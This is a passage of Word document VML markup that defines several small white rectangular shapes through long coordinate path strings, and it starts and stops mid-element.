2920,7067,2920,7067,2920,7068,2920,7068,2920,7069,2920,7069,2920,7070,2920,7070,2920,7071,2920,7072,2920,7072,2920,7073,2920,7074,2920,7075,2920,7075,2920,7076,2920,7077,2920,7078,2920,7079,2920,7080,2920,7081,2920,7083,2920,7084,2920,7085,2920,7086,2920,7088,2920,7089,2920,7091,2920,7092,2920,7094,2920,7095,2920,7097,2920,7099,2920,7100,2920,7102,2920,7104,2920,7106,2920,7108,2920,7110,2920,7112,2920,7114,2920,7117,2920,7119,2920,7121,2920,7124,2920,7126,2920,7129,2920,7132,2920,7134,2920,7137,2920,7140,2920,7143,2920,7146,2920,7149,2920,7152,2920,7156,2920,7159,2920,7162,2920,7166,2920,7169,2920,7173,2920,7177,2920,7180,2920,7184,2920,7188,2920,7192,2920,7196,2920,7201,2920,7205,2920,7209,2920,7214,2920,7219,2920,7223,2920,7228,2920,7233,2920,7238,2920,7243,2920,7248,2920,7253,2920,7259,2920,7264,2920,7270,2920,7275,2920,7281,2920,7287,2920,7293,2920,7299,2920,7305,2920,7311,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2919,7318,2919,7318,2919,7318,2919,7318,2919,7318,2919,7318,2919,7318,2918,7318,2918,7318,2918,7318,2918,7318,2917,7318,2917,7318,2917,7318,2917,7318,2916,7318,2916,7318,2916,7318,2915,7318,2915,7318,2914,7318,2914,7318,2914,7318,2913,7318,2913,7318,2912,7318,2912,7318,2911,7318,2910,7318,2910,7318,2909,7318,2909,7318,2908,7318,2907,7318,2907,7318,2906,7318,2905,7318,2904,7318,2903,7318,2903,7318,2902,7318,2901,7318,2900,7318,2899,7318,2898,7318,2897,7318,2896,7318,2895,7318,2894,7318,2893,7318,2892,7318,2890,7318,2889,7318,2888,7318,2887,7318,2885,7318,2884,7318,2883,7318,2881,7318,2880,7318,2878,7318,2877,7318,2875,7318,2874,7318,2872,7318,2870,7318,2869,7318,2867,7318,2865,7318,2863,7318,2861,7318,2859,7318,2857,7318,2855,7318,2853,7318,2851,7318,2849,7318,2847,7318,2845,7318,2843,7318,2840,7318,2838,7318,2836,7318,2833,7318,2831,7318,2828,7318,2826,7318,2823,7318,2820,7318,2818,7318,2815,7318,2812,7318,2809,7318,2806,7318,2803,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7316,2800,7316,2800,7316,2800,7316,2800,7316,2800,7315,2800,7315,2800,7315,2800,7314,2800,7314,2800,7314,2800,7313,2800,7313,2800,7312,2800,7312,2800,7311,2800,7311,2800,7310,2800,7309,2800,7309,2800,7308,2800,7307,2800,7306,2800,7306,2800,7305,2800,7304,2800,7303,2800,7302,2800,7301,2800,7300,2800,7299,2800,7298,2800,7296,2800,7295,2800,7294,2800,7292,2800,7291,2800,7290,2800,7288,2800,7287,2800,7285,2800,7283,2800,7282,2800,7280,2800,7278,2800,7276,2800,7274,2800,7272,2800,7270,2800,7268,2800,7266,2800,7263,2800,7261,2800,7259,2800,7256,2800,7254,2800,7251,2800,7249,2800,7246,2800,7243,2800,7240,2800,7237,2800,7234,2800,7231,2800,7228,2800,7225,2800,7221,2800,7218,2800,7215,2800,7211,2800,7207,2800,7204,2800,7200,2800,7196,2800,7192,2800,7188,2800,7184,2800,7180,2800,7175,2800,7171,2800,7166,2800,7162,2800,7157,2800,7152,2800,7147,2800,7142,2800,7137,2800,7132,2800,7127,2800,7122,2800,7116,2800,7111,2800,7105,2800,7099,2800,7093,2800,7087,2800,7081,2800,7075,2800,7069,2800,7063e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:383.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,7670" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:7670;width:130;height:270" coordorigin="2790,7670" coordsize="130,270" path="m2800,7693l2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2802,7693,2802,7693,2802,7693,2802,7693,2802,7693,2802,7693,2803,7693,2803,7693,2803,7693,2803,7693,2803,7693,2804,7693,2804,7693,2804,7693,2805,7693,2805,7693,2805,7693,2806,7693,2806,7693,2806,7693,2807,7693,2807,7693,2808,7693,2808,7693,2809,7693,2809,7693,2810,7693,2810,7693,2811,7693,2812,7693,2812,7693,2813,7693,2814,7693,2814,7693,2815,7693,2816,7693,2817,7693,2817,7693,2818,7693,2819,7693,2820,7693,2821,7693,2822,7693,2823,7693,2824,7693,2825,7693,2826,7693,2827,7693,2828,7693,2829,7693,2830,7693,2832,7693,2833,7693,2834,7693,2836,7693,2837,7693,2838,7693,2840,7693,2841,7693,2843,7693,2844,7693,2846,7693,2847,7693,2849,7693,2851,7693,2852,7693,2854,7693,2856,7693,2858,7693,2860,7693,2861,7693,2863,7693,2865,7693,2867,7693,2870,7693,2872,7693,2874,7693,2876,7693,2878,7693,2881,7693,2883,7693,2885,7693,2888,7693,2890,7693,2893,7693,2895,7693,2898,7693,2901,7693,2903,7693,2906,7693,2909,7693,2912,7693,2915,7693,2917,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7694,2920,7694,2920,7694,2920,7694,2920,7694,2920,7694,2920,7695,2920,7695,2920,7695,2920,7696,2920,7696,2920,7696,2920,7697,2920,7697,2920,7697,2920,7698,2920,7698,2920,7699,2920,7699,2920,7700,2920,7701,2920,7701,2920,7702,2920,7703,2920,7703,2920,7704,2920,7705,2920,7706,2920,7707,2920,7708,2920,7709,2920,7710,2920,7711,2920,7712,2920,7713,2920,7714,2920,7715,2920,7717,2920,7718,2920,7719,2920,7721,2920,7722,2920,7724,2920,7726,2920,7727,2920,7729,2920,7731,2920,7733,2920,7734,2920,7736,2920,7738,2920,7740,2920,7743,2920,7745,2920,7747,2920,7749,2920,7752,2920,7754,2920,7757,2920,7759,2920,7762,2920,7765,2920,7768,2920,7770,2920,7773,2920,7776,2920,7779,2920,7783,2920,7786,2920,7789,2920,7793,2920,7796,2920,7800,2920,7803,2920,7807,2920,7811,2920,7815,2920,7819,2920,7823,2920,7827,2920,7831,2920,7835,2920,7840,2920,7844,2920,7849,2920,7854,2920,7858,2920,7863,2920,7868,2920,7873,2920,7878,2920,7884,2920,7889,2920,7894,2920,7900,2920,7906,2920,7911,2920,7917,2920,7923,2920,7929,2920,7935,2920,7942,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2919,7948,2919,7948,2919,7948,2919,7948,2919,7948,2919,7948,2919,7948,2918,7948,2918,7948,2918,7948,2918,7948,2917,7948,2917,7948,2917,7948,2917,7948,2916,7948,2916,7948,2916,7948,2915,7948,2915,7948,2914,7948,2914,7948,2914,7948,2913,7948,2913,7948,2912,7948,2912,7948,2911,7948,2910,7948,2910,7948,2909,7948,2909,7948,2908,7948,2907,7948,2907,7948,2906,7948,2905,7948,2904,7948,2903,7948,2903,7948,2902,7948,2901,7948,2900,7948,2899,7948,2898,7948,2897,7948,2896,7948,2895,7948,2894,7948,2893,7948,2892,7948,2890,7948,2889,7948,2888,7948,2887,7948,2885,7948,2884,7948,2883,7948,2881,7948,2880,7948,2878,7948,2877,7948,2875,7948,2874,7948,2872,7948,2870,7948,2869,7948,2867,7948,2865,7948,2863,7948,2861,7948,2859,7948,2857,7948,2855,7948,2853,7948,2851,7948,2849,7948,2847,7948,2845,7948,2843,7948,2840,7948,2838,7948,2836,7948,2833,7948,2831,7948,2828,7948,2826,7948,2823,7948,2820,7948,2818,7948,2815,7948,2812,7948,2809,7948,2806,7948,2803,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7947,2800,7947,2800,7947,2800,7947,2800,7947,2800,7947,2800,7947,2800,7946,2800,7946,2800,7946,2800,7946,2800,7945,2800,7945,2800,7945,2800,7944,2800,7944,2800,7943,2800,7943,2800,7943,2800,7942,2800,7942,2800,7941,2800,7940,2800,7940,2800,7939,2800,7938,2800,7938,2800,7937,2800,7936,2800,7935,2800,7934,2800,7933,2800,7932,2800,7931,2800,7930,2800,7929,2800,7928,2800,7927,2800,7925,2800,7924,2800,7923,2800,7921,2800,7920,2800,7918,2800,7917,2800,7915,2800,7914,2800,7912,2800,7910,2800,7908,2800,7906,2800,7904,2800,7902,2800,7900,2800,7898,2800,7896,2800,7894,2800,7891,2800,7889,2800,7887,2800,7884,2800,7882,2800,7879,2800,7876,2800,7873,2800,7870,2800,7868,2800,7865,2800,7861,2800,7858,2800,7855,2800,7852,2800,7848,2800,7845,2800,7841,2800,7838,2800,7834,2800,7830,2800,7826,2800,7822,2800,7818,2800,7814,2800,7810,2800,7806,2800,7801,2800,7797,2800,7792,2800,7787,2800,7783,2800,7778,2800,7773,2800,7768,2800,7763,2800,7757,2800,7752,2800,7746,2800,7741,2800,7735,2800,7730,2800,7724,2800,7718,2800,7712,2800,7706,2800,7699,2800,7693e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:415.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,8310" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:8310;width:130;height:270" coordorigin="2790,8310" coordsize="130,270" path="m2800,8338l2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2802,8338,2802,8338,2802,8338,2802,8338,2802,8338,2802,8338,2803,8338,2803,8338,2803,8338,2803,8338,2803,8338,2804,8338,2804,8338,2804,8338,2805,8338,2805,8338,2805,8338,2806,8338,2806,8338,2806,8338,2807,8338,2807,8338,2808,8338,2808,8338,2809,8338,2809,8338,2810,8338,2810,8338,2811,8338,2812,8338,2812,8338,2813,8338,2814,8338,2814,8338,2815,8338,2816,8338,2817,8338,2817,8338,2818,8338,2819,8338,2820,8338,2821,8338,2822,8338,2823,8338,2824,8338,2825,8338,2826,8338,2827,8338,2828,8338,2829,8338,2830,8338,2832,8338,2833,8338,2834,8338,2836,8338,2837,8338,2838,8338,2840,8338,2841,8338,2843,8338,2844,8338,2846,8338,2847,8338,2849,8338,2851,8338,2852,8338,2854,8338,2856,8338,2858,8338,2860,8338,2861,8338,2863,8338,2865,8338,2867,8338,2870,8338,2872,8338,2874,8338,2876,8338,2878,8338,2881,8338,2883,8338,2885,8338,2888,8338,2890,8338,2893,8338,2895,8338,2898,8338,2901,8338,2903,8338,2906,8338,2909,8338,2912,8338,2915,8338,2917,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8339,2920,8339,2920,8339,2920,8339,2920,8339,2920,8339,2920,8339,2920,8339,2920,8340,2920,8340,2920,8340,2920,8340,2920,8341,2920,8341,2920,8341,2920,8342,2920,8342,2920,8342,2920,8343,2920,8343,2920,8344,2920,8344,2920,8345,2920,8345,2920,8346,2920,8347,2920,8347,2920,8348,2920,8349,2920,8349,2920,8350,2920,8351,2920,8352,2920,8353,2920,8354,2920,8355,2920,8356,2920,8357,2920,8358,2920,8359,2920,8361,2920,8362,2920,8363,2920,8365,2920,8366,2920,8368,2920,8369,2920,8371,2920,8373,2920,8374,2920,8376,2920,8378,2920,8380,2920,8382,2920,8384,2920,8386,2920,8388,2920,8390,2920,8392,2920,8395,2920,8397,2920,8400,2920,8402,2920,8405,2920,8407,2920,8410,2920,8413,2920,8416,2920,8419,2920,8422,2920,8425,2920,8428,2920,8431,2920,8434,2920,8438,2920,8441,2920,8445,2920,8449,2920,8452,2920,8456,2920,8460,2920,8464,2920,8468,2920,8472,2920,8476,2920,8481,2920,8485,2920,8490,2920,8494,2920,8499,2920,8504,2920,8508,2920,8513,2920,8519,2920,8524,2920,8529,2920,8534,2920,8540,2920,8545,2920,8551,2920,8557,2920,8562,2920,8568,2920,8575,2920,8581,2920,8587,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2919,8593,2919,8593,2919,8593,2919,8593,2919,8593,2919,8593,2919,8593,2918,8593,2918,8593,2918,8593,2918,8593,2917,8593,2917,8593,2917,8593,2917,8593,2916,8593,2916,8593,2916,8593,2915,8593,2915,8593,2914,8593,2914,8593,2914,8593,2913,8593,2913,8593,2912,8593,2912,8593,2911,8593,2910,8593,2910,8593,2909,8593,2909,8593,2908,8593,2907,8593,2907,8593,2906,8593,2905,8593,2904,8593,2903,8593,2903,8593,2902,8593,2901,8593,2900,8593,2899,8593,2898,8593,2897,8593,2896,8593,2895,8593,2894,8593,2893,8593,2892,8593,2890,8593,2889,8593,2888,8593,2887,8593,2885,8593,2884,8593,2883,8593,2881,8593,2880,8593,2878,8593,2877,8593,2875,8593,2874,8593,2872,8593,2870,8593,2869,8593,2867,8593,2865,8593,2863,8593,2861,8593,2859,8593,2857,8593,2855,8593,2853,8593,2851,8593,2849,8593,2847,8593,2845,8593,2843,8593,2840,8593,2838,8593,2836,8593,2833,8593,2831,8593,2828,8593,2826,8593,2823,8593,2820,8593,2818,8593,2815,8593,2812,8593,2809,8593,2806,8593,2803,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8592,2800,8592,2800,8592,2800,8592,2800,8592,2800,8591,2800,8591,2800,8591,2800,8591,2800,8590,2800,8590,2800,8590,2800,8589,2800,8589,2800,8588,2800,8588,2800,8587,2800,8587,2800,8586,2800,8586,2800,8585,2800,8584,2800,8584,2800,8583,2800,8582,2800,8581,2800,8580,2800,8580,2800,8579,2800,8578,2800,8577,2800,8576,2800,8574,2800,8573,2800,8572,2800,8571,2800,8569,2800,8568,2800,8567,2800,8565,2800,8564,2800,8562,2800,8561,2800,8559,2800,8557,2800,8555,2800,8554,2800,8552,2800,8550,2800,8548,2800,8546,2800,8544,2800,8541,2800,8539,2800,8537,2800,8534,2800,8532,2800,8529,2800,8527,2800,8524,2800,8521,2800,8519,2800,8516,2800,8513,2800,8510,2800,8507,2800,8504,2800,8500,2800,8497,2800,8494,2800,8490,2800,8487,2800,8483,2800,8479,2800,8475,2800,8472,2800,8468,2800,8464,2800,8459,2800,8455,2800,8451,2800,8446,2800,8442,2800,8437,2800,8433,2800,8428,2800,8423,2800,8418,2800,8413,2800,8408,2800,8403,2800,8397,2800,8392,2800,8386,2800,8381,2800,8375,2800,8369,2800,8363,2800,8357,2800,8351,2800,8345,2800,8338e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:447.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,8950" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:8950;width:130;height:270" coordorigin="2790,8950" coordsize="130,270" path="m2800,8969l2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2802,8969,2802,8969,2802,8969,2802,8969,2802,8969,2802,8969,2803,8969,2803,8969,2803,8969,2803,8969,2803,8969,2804,8969,2804,8969,2804,8969,2805,8969,2805,8969,2805,8969,2806,8969,2806,8969,2806,8969,2807,8969,2807,8969,2808,8969,2808,8969,2809,8969,2809,8969,2810,8969,2810,8969,2811,8969,2812,8969,2812,8969,2813,8969,2814,8969,2814,8969,2815,8969,2816,8969,2817,8969,2817,8969,2818,8969,2819,8969,2820,8969,2821,8969,2822,8969,2823,8969,2824,8969,2825,8969,2826,8969,2827,8969,2828,8969,2829,8969,2830,8969,2832,8969,2833,8969,2834,8969,2836,8969,2837,8969,2838,8969,2840,8969,2841,8969,2843,8969,2844,8969,2846,8969,2847,8969,2849,8969,2851,8969,2852,8969,2854,8969,2856,8969,2858,8969,2860,8969,2861,8969,2863,8969,2865,8969,2867,8969,2870,8969,2872,8969,2874,8969,2876,8969,2878,8969,2881,8969,2883,8969,2885,8969,2888,8969,2890,8969,2893,8969,2895,8969,2898,8969,2901,8969,2903,8969,2906,8969,2909,8969,2912,8969,2915,8969,2917,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8970,2920,8970,2920,8970,2920,8970,2920,8970,2920,8971,2920,8971,2920,8971,2920,8971,2920,8972,2920,8972,2920,8973,2920,8973,2920,8973,2920,8974,2920,8974,2920,8975,2920,8976,2920,8976,2920,8977,2920,8977,2920,8978,2920,8979,2920,8980,2920,8981,2920,8981,2920,8982,2920,8983,2920,8984,2920,8985,2920,8986,2920,8987,2920,8989,2920,8990,2920,8991,2920,8992,2920,8994,2920,8995,2920,8997,2920,8998,2920,9000,2920,9001,2920,9003,2920,9005,2920,9006,2920,9008,2920,9010,2920,9012,2920,9014,2920,9016,2920,9018,2920,9020,2920,9023,2920,9025,2920,9027,2920,9030,2920,9032,2920,9035,2920,9038,2920,9040,2920,9043,2920,9046,2920,9049,2920,9052,2920,9055,2920,9058,2920,9061,2920,9065,2920,9068,2920,9072,2920,9075,2920,9079,2920,9083,2920,9086,2920,9090,2920,9094,2920,9098,2920,9102,2920,9107,2920,9111,2920,9115,2920,9120,2920,9124,2920,9129,2920,9134,2920,9139,2920,9144,2920,9149,2920,9154,2920,9159,2920,9165,2920,9170,2920,9176,2920,9181,2920,9187,2920,9193,2920,9199,2920,9205,2920,9211,2920,9217,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2919,9224,2919,9224,2919,9224,2919,9224,2919,9224,2919,9224,2919,9224,2918,9224,2918,9224,2918,9224,2918,9224,2917,9224,2917,9224,2917,9224,2917,9224,2916,9224,2916,9224,2916,9224,2915,9224,2915,9224,2914,9224,2914,9224,2914,9224,2913,9224,2913,9224,2912,9224,2912,9224,2911,9224,2910,9224,2910,9224,2909,9224,2909,9224,2908,9224,2907,9224,2907,9224,2906,9224,2905,9224,2904,9224,2903,9224,2903,9224,2902,9224,2901,9224,2900,9224,2899,9224,2898,9224,2897,9224,2896,9224,2895,9224,2894,9224,2893,9224,2892,9224,2890,9224,2889,9224,2888,9224,2887,9224,2885,9224,2884,9224,2883,9224,2881,9224,2880,9224,2878,9224,2877,9224,2875,9224,2874,9224,2872,9224,2870,9224,2869,9224,2867,9224,2865,9224,2863,9224,2861,9224,2859,9224,2857,9224,2855,9224,2853,9224,2851,9224,2849,9224,2847,9224,2845,9224,2843,9224,2840,9224,2838,9224,2836,9224,2833,9224,2831,9224,2828,9224,2826,9224,2823,9224,2820,9224,2818,9224,2815,9224,2812,9224,2809,9224,2806,9224,2803,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9223,2800,9223,2800,9223,2800,9223,2800,9223,2800,9223,2800,9223,2800,9223,2800,9223,2800,9223,2800,9222,2800,9222,2800,9222,2800,9222,2800,9222,2800,9221,2800,9221,2800,9221,2800,9220,2800,9220,2800,9220,2800,9219,2800,9219,2800,9218,2800,9218,2800,9217,2800,9217,2800,9216,2800,9215,2800,9215,2800,9214,2800,9213,2800,9212,2800,9212,2800,9211,2800,9210,2800,9209,2800,9208,2800,9207,2800,9206,2800,9205,2800,9204,2800,9202,2800,9201,2800,9200,2800,9198,2800,9197,2800,9196,2800,9194,2800,9193,2800,9191,2800,9189,2800,9188,2800,9186,2800,9184,2800,9182,2800,9180,2800,9178,2800,9176,2800,9174,2800,9172,2800,9169,2800,9167,2800,9165,2800,9162,2800,9160,2800,9157,2800,9155,2800,9152,2800,9149,2800,9146,2800,9143,2800,9140,2800,9137,2800,9134,2800,9131,2800,9127,2800,9124,2800,9120,2800,9117,2800,9113,2800,9110,2800,9106,2800,9102,2800,9098,2800,9094,2800,9090,2800,9085,2800,9081,2800,9077,2800,9072,2800,9068,2800,9063,2800,9058,2800,9053,2800,9048,2800,9043,2800,9038,2800,9033,2800,9028,2800,9022,2800,9017,2800,9011,2800,9005,2800,8999,2800,8993,2800,8987,2800,8981,2800,8975,2800,8969e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:479.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,9590" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:9590;width:130;height:270" coordorigin="2790,9590" coordsize="130,270" path="m2800,9614l2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2801,9614,2801,9614,2801,9614,2801,9614,2801,9614,2801,9614,2801,9614,2801,9614,2801,9614,2801,9614,2801,9614,2801,9614,2801,9614,2801,9614,2802,9614,2802,9614,2802,9614,2802,9614,2802,9614,2802,9614,2803,9614,2803,9614,2803,9614,2803,9614,2803,9614,2804,9614,2804,9614,2804,9614,2805,9614,2805,9614,2805,9614,2806,9614,2806,9614,2806,9614,2807,9614,2807,9614,2808,9614,2808,9614,2809,9614,2809,9614,2810,9614,2810,9614,2811,9614,2812,9614,2812,9614,2813,9614,2814,9614,2814,9614,2815,9614,2816,9614,2817,9614,2817,9614,2818,9614,2819,9614,2820,9614,2821,9614,2822,9614,2823,9614,2824,9614,2825,9614,2826,9614,2827,9614,2828,9614,2829,9614,2830,9614,2832,9614,2833,9614,2834,9614,2836,9614,2837,9614,2838,9614,2840,9614,2841,9614,2843,9614,2844,9614,2846,9614,2847,9614,2849,9614,2851,9614,2852,9614,2854,9614,2856,9614,2858,9614,2860,9614,2861,9614,2863,9614,2865,9614,2867,9614,2870,9614,2872,9614,2874,9614,2876,9614,2878,9614,2881,9614,2883,9614,2885,9614,2888,9614,2890,9614,2893,9614,2895,9614,2898,9614,2901,9614,2903,9614,2906,9614,2909,9614,2912,9614,2915,9614,2917,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9614,2920,9615,2920,9615,2920,9615,2920,9615,2920,9615,2920,9615,2920,9616,2920,9616,2920,9616,2920,9616,2920,9617,2920,9617,2920,9618,2920,9618,2920,9618,2920,9619,2920,9619,2920,9620,2920,9620,2920,9621,2920,9622,2920,9622,2920,9623,2920,9624,2920,9624,2920,9625,2920,9626,2920,9627,2920,9628,2920,9629,2920,9630,2920,9631,2920,9632,2920,9633,2920,9634,2920,9635,2920,9636,2920,9638,2920,9639,2920,9640,2920,9642,2920,9643,2920,9645,2920,9647,2920,9648,2920,9650,2920,9652,2920,9654,2920,9655,2920,9657,2920,9659,2920,9661,2920,9664,2920,9666,2920,9668,2920,9670,2920,9673,2920,9675,2920,9678,2920,9680,2920,9683,2920,9686,2920,9688,2920,9691,2920,9694,2920,9697,2920,9700,2920,9704,2920,9707,2920,9710,2920,9714,2920,9717,2920,9721,2920,9724,2920,9728,2920,9732,2920,9736,2920,9740,2920,9744,2920,9748,2920,9752,2920,9756,2920,9761,2920,9765,2920,9770,2920,9775,2920,9779,2920,9784,2920,9789,2920,9794,2920,9799,2920,9805,2920,9810,2920,9815,2920,9821,2920,9827,2920,9832,2920,9838,2920,9844,2920,9850,2920,9856,2920,9863,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2920,9869,2919,9869,2919,9869,2919,9869,2919,9869,2919,9869,2919,9869,2919,9869,2918,9869,2918,9869,2918,9869,2918,9869,2917,9869,2917,9869,2917,9869,2917,9869,2916,9869,2916,9869,2916,9869,2915,9869,2915,9869,2914,9869,2914,9869,2914,9869,2913,9869,2913,9869,2912,9869,2912,9869,2911,9869,2910,9869,2910,9869,2909,9869,2909,9869,2908,9869,2907,9869,2907,9869,2906,9869,2905,9869,2904,9869,2903,9869,2903,9869,2902,9869,2901,9869,2900,9869,2899,9869,2898,9869,2897,9869,2896,9869,2895,9869,2894,9869,2893,9869,2892,9869,2890,9869,2889,9869,2888,9869,2887,9869,2885,9869,2884,9869,2883,9869,2881,9869,2880,9869,2878,9869,2877,9869,2875,9869,2874,9869,2872,9869,2870,9869,2869,9869,2867,9869,2865,9869,2863,9869,2861,9869,2859,9869,2857,9869,2855,9869,2853,9869,2851,9869,2849,9869,2847,9869,2845,9869,2843,9869,2840,9869,2838,9869,2836,9869,2833,9869,2831,9869,2828,9869,2826,9869,2823,9869,2820,9869,2818,9869,2815,9869,2812,9869,2809,9869,2806,9869,2803,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9868,2800,9868,2800,9868,2800,9868,2800,9868,2800,9868,2800,9868,2800,9867,2800,9867,2800,9867,2800,9867,2800,9866,2800,9866,2800,9866,2800,9865,2800,9865,2800,9864,2800,9864,2800,9864,2800,9863,2800,9862,2800,9862,2800,9861,2800,9861,2800,9860,2800,9859,2800,9859,2800,9858,2800,9857,2800,9856,2800,9855,2800,9854,2800,9853,2800,9852,2800,9851,2800,9850,2800,9849,2800,9848,2800,9846,2800,9845,2800,9844,2800,9842,2800,9841,2800,9839,2800,9838,2800,9836,2800,9835,2800,9833,2800,9831,2800,9829,2800,9827,2800,9825,2800,9823,2800,9821,2800,9819,2800,9817,2800,9815,2800,9812,2800,9810,2800,9808,2800,9805,2800,9803,2800,9800,2800,9797,2800,9794,2800,9791,2800,9789,2800,9785,2800,9782,2800,9779,2800,9776,2800,9773,2800,9769,2800,9766,2800,9762,2800,9759,2800,9755,2800,9751,2800,9747,2800,9743,2800,9739,2800,9735,2800,9731,2800,9726,2800,9722,2800,9718,2800,9713,2800,9708,2800,9704,2800,9699,2800,9694,2800,9689,2800,9683,2800,9678,2800,9673,2800,9667,2800,9662,2800,9656,2800,9651,2800,9645,2800,9639,2800,9633,2800,9626,2800,9620,2800,9614e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:511.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,10230" coordsize="130,250">
